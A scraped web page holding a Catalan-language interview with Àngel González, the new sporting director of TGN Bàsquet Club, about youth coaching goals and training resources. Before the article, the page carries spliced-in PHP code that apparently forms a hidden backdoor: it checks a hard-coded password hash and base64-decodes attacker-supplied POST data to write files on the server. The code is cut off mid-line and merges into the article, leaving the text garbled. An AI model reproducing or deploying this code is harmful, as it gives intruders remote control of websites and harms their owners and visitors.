function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" "El TGN Bàsquet és el club de la demarcació de Tarragona amb les millors condicions de treball" - Tgn Bàsquet Club -

“El TGN Bàsquet és el club de la demarcació de Tarragona amb les millors condicions de treball”

By
Updated: juny 17, 2015

Àngel González (13/2/1986) és el nou director esportiu del TGN Bàsquet Club. Aquest tècnic, que porta dues temporades a la casa -l’any passat dirigint el sènior B i enguany l’infantil masculí- arriba disposat a fer que el club lila faci un salt endavant en el seu bàsquet base del qual és, segons ell, un referent. “El TGN Bàsquet està en una situació privilegiada pel que fa la quantitat de jugadors de què disposa. És molt difícil trobar un club que tingui jugadors des de P-5 fins a sènior i amb la quantitat que hi ha aquí”, assegura.

González, tot i la seva joventut, és un rodamón del bàsquet i coneix bé com es treballa arreu. Va començar com a jugador a La Salle Tarragona, on estudiava, per passar a l’ADT en categoria infantil. En el club de Torreforta va jugar fins a categoria sènior, on va arribar a debutar a la lliga EBA. “Recordo perfectament aquell partit. Vaig sortir al final i, després d’una passada de Jordi Matamoros, vaig encistellar des de mitja pista”, diu tot rient. Com a entrenador ha voltat molt. Va començar a La Salle quan només tenia 15 anys com a entrenador ajudant en un equip benjamí i, quatre anys després va marxar a l’ADT. Amb l’inici de la seva carrera universitària a Lleida (Institut Nacional d’Educació Física de Catalunya, INEFC) va assumir, per primera vegada, el paper de primer entrenador, en un aleví masculí que estava cridat a ser un dels equips importants del Lleida Bàsquet en vista al futur. “D’aquell grup tres jugadors van arribar al primer equip que jugava a LEB”. En tornar a Tarragona va ser un dels ajudants de Miquel Domingo a l’ADT en les lligues LEB i també feia la preparació física de l’equip. Abans d’arribar al TGN Bàsquet, va passar també pel Manyanet i el Sant Pau.

“El club té molt potencial però falta una línia a seguir, això és el que em proposo fer”, diu amb seguretat. “S’han de marcar uns objectius clars cada temporada, treballar per aconseguir objectius. És a dir, els jugadors han de saber fer certes coses, tenir uns fonaments assumits en cada etapa, en cada categoria, per això treballarem”, afirma. Així, González marcarà unes pautes que serviran perquè cada entrenador prepari els entrenaments per tal d’aconseguir els objectius fixats. “Si volem que els alevins dominin la pilota amb ambdues mans, fer els canvis de mans bàsics i que puguin fer entrades tant amb l’esquerra com la dreta, ja sabem què hem de treballar. Això facilita la feina als entrenadors”. En aquest sentit, el nou director esportiu del club, que serà el responsable dels equips de categoria júnior en avall -els conjunts sèniors dependran directament del vicepresident Iñaki Liarte i la junta directiva- considera que s’ha de fer un treball de formació dels entrenadors més joves del club: “Tenim molta gent jove, molt implicada, a qui hem de donar més recursos i formar més. Així, tenim previst fer xerrades i clínics amb entrenadors que vinguin de fora i, a la pretemporada, fer una estada d’entrenadors en què hi hagi diferents ponències a càrrec dels entrenadors més experts del club”.

González no estarà sol. L’excapitana del Nemser TGN Bàsquet Montse Martí serà una de les seves ajudants i s’encarregarà de la supervisió dels equips de categoria benjamina en avall. Un tècnic que encara està per determinar serà l’encarregat d’observar les categories cadet i júnior, mentre que el mateix González portarà directament la supervisió d’alevins i infantils. “Els entrenadors han de sentir el nostre suport, que vegin que estem a la seva disposició. M’he proposat, com a mínim, veure un entrenament de cada equip a la setmana”, afirma. El director esportiu del club lila assegura que el TGN Bàsquet es troba en una situació de privilegi: “El TGN Bàsquet és el club de la demarcació de Tarragona que té les millors condicions de treball per poder entrenar. Què vol dir això? Doncs que disposem, per exemple, de tot el material necessari. Una cosa que a molta gent li pot semblar una estupidesa però que no ho és: aquí hi ha una pilota per a cada jugador. I això no vol dir que els equips es passen les pilotes d’uns a altres, no. Vol dir que si un equip té 14 jugadors, té 14 pilotes, i que un altre en té les seves. No es comparteixen. Jo he estat en llocs on hi havia 15 pilotes a tot el club i, és clar, a mitja temporada ja estaven fetes malbé”. I explica encara: “Tenim un pavelló on tots els equips tenen gairebé garantit dos entrenaments per setmana i una màquina de tir que l’any vinent encara utilitzarem més per millorar la mecànica i la punteria dels nostres jugadors”. D’aquesta manera, es preveu programar més tecnificacions i ampliar-les a altres categories, i no només als alevins. “L’any que ve ho farem també amb infantils, en dies diferents, és clar. A la llarga volem que hi hagi una jornada de tecnificació mensual per a cada categoria”.

El director esportiu està convençut que el TGN Bàsquet farà un salt qualitatiu en un període relativament curt de temps i que serà el referent absolut en el bàsquet femení. “Si, com deia anteriorment, treballem per objectius, els resultats arribaran. Cada entrenador sabrà què han fet els seus jugadors l’any anterior, quins conceptes i fonaments dominen i això li permetrà avançar molt. En l’àmbit femení, el TGN Bàsquet serà el referent total”.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *